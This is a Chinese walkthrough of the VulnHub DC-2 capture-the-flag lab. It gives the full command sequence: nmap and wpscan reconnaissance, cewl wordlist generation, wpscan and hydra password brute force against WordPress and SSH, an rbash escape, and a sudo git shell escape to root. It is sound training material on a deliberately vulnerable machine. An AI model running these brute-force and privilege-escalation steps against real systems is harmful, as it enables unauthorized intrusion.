vulnhub DC-2 靶机渗透
准备:
环境:vmware15.5以上(我用的是16.0的)
攻击机:kali 2019以上(2021)
靶机:DC-2
靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
靶机ip:192.168.184.1
攻击机ip: 192.168.184.26
下载、安装及网络设置 请参考之前发布的dc-1的 太懒了不想敲 ~ ~
一、信息收集
1、老样子 先查看自己攻击的IP 来确定网段
ipconfig

一般kali ip是不动的 一直在变化的是目标的ip
2、扫描网段内的存活主机
arp-scan -l

arp-scan 也可以扫描存活主机 上期nmap也可以
访问一下看看

发现通过ip访问失败 原因可能有两种 一个可能是网络配置的问题 一个可能要配置本地dns解析才能访问
3、不急我们先扫描一下端口和服务
nmap -T4 -A 192.168.184.1 -p- -oN c1.txt

-p- 等同于 -p 1-65535 都是扫描全部端口
-oN 扫描结果另存为xxx文件(文件保存在root目录底下)
ls

这里就 不看了
(PS:这个又什么用? 后期写渗透测试报告可以用到 文件可以用vmtools直接移出来 或者通过Bitvise SSH Client 移出来)
不多bb了,我们来分析
1、它开了80端口 http服务
2、它开了7744端口 ssh服务 ssh登入口令爆破 (他吧ssh默认端口(22)改了还是有点防范意识的)
3.域名:http://dc-2/
怎么通过IP来访问它?
4、配置本地dns解析 hosts文件

hosts 文件: 定义IP地址和主机名的映射关系,是一个映射IP地址和主机名的规定。 将一些常用的网址域名对应的 IP 地址记录,加快域名解析、屏蔽网站等
用记事本打开 在结尾添加 IP 域名 我这里IP是192.168.184.1 那我应该填 192.168.184.1 dc-2
windows
hosts文件地址:C:\Windows\System32\drivers\etc\hosts
注:更改hosts文件必须是administrator用户!!!! 普通用户默认是没有权限的!!!!!
kali
hosts文件地址:/etc/hosts
vim/etc/hosts

按e
进入后按 i 就可以编辑了

保存:先按Esc键 然后 输入:wq 回车即可

然后我们再来访问

这里输域名和IP是都能访问的
flag1在这

flag1:
你通常的词表可能不起作用,所以,也许你只需要成为cewl。
密码越多越好,但有时你不可能赢得所有密码。
作为一个登录以查看下一个标志。
如果找不到,请以其他用户身份登录。
5、敏感目录扫描
nikto -h 192.168.184.1
nikto 敏感目录扫描工具
找到网页后台登入页面 它用的是 wordpress 框架
去访问看看
http://dc-2/wp-login.php

6、扫描该网站存在的用户名
wpscan --url dc-2 -e u

wpscan Wordpress的专用扫描器
扫到3个wordpress的用户:admin jerry tom
7、搜集可能的密码
cewl dc-2 -w pass.txt
ls
cat pass.txt

cewl 密码字典生成器
-w 文件名:将结果写入文件中
8、在root文件夹下创建一个username.txt
内容为:admin jerry tom

9、破解wp用户名密码
wpscan --url dc-2 -U username.txt -P pass.txt

Username: jerry, Password: adipiscing
Username: tom, Password: parturient
10、随便选一组登一下

flag2在这里:
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你能找到另一个切入点。
11、破解ssh
hydra -L username.txt -P pass.txt 172.20.10.10 ssh -s 7744

login: tom password: parturient
12、ssh登入
ssh tom@192.168.184.1 -p 7744
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
parturient

13、登入后还是老样子 查看权限、敏感目录下的文件、用户目录下的文件

发现他对用户权限做了限制(-rbash)
14、看看自己命令行在哪
echo $PATH

15、查看自己可以用什么命令
ls usr/bin

发现可以使用 vi编辑器
16、使用vi编辑器 打开flag3.txt
vi flag3.txt

注:退出不要点 x 输入:q 不保存且退出
17、更具提示切换jerry用户
su jerry

使用 su jerry 发现 su 被 rbash
18、rbash绕过
BASH_CMDS[a]=/bin/sh
a
/bin/bash

命令的意思:按下键盘a就可以调用/bin/sh命令行
发现cat还是用不了
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

把高级权限的命令行也加到自己的环境变量里
19、切换用户
su jerry
adipiscing

20.回到自己的home目录
cd ~
ls
cat flag4.txt

21、查看可以以root权限使用什么命令
sudo -l

发现 git
22、git提权
方法一:
sudo git help config

进来之后输入
!/bin/sh

查看权限

提权成功
方法二:
sudo git -p --help

直接输入!whoami

注:之后的每一条命令前面都要加上! 比如!ls

23、回到根目录 找最后一个flag

到这就结束了~
蟹蟹曾郡老师以及帮助过我的人~
不定期更新,感觉很有料关注一下呗~~~
求三连~~~~谢谢~

浙公网安备 33010602011771号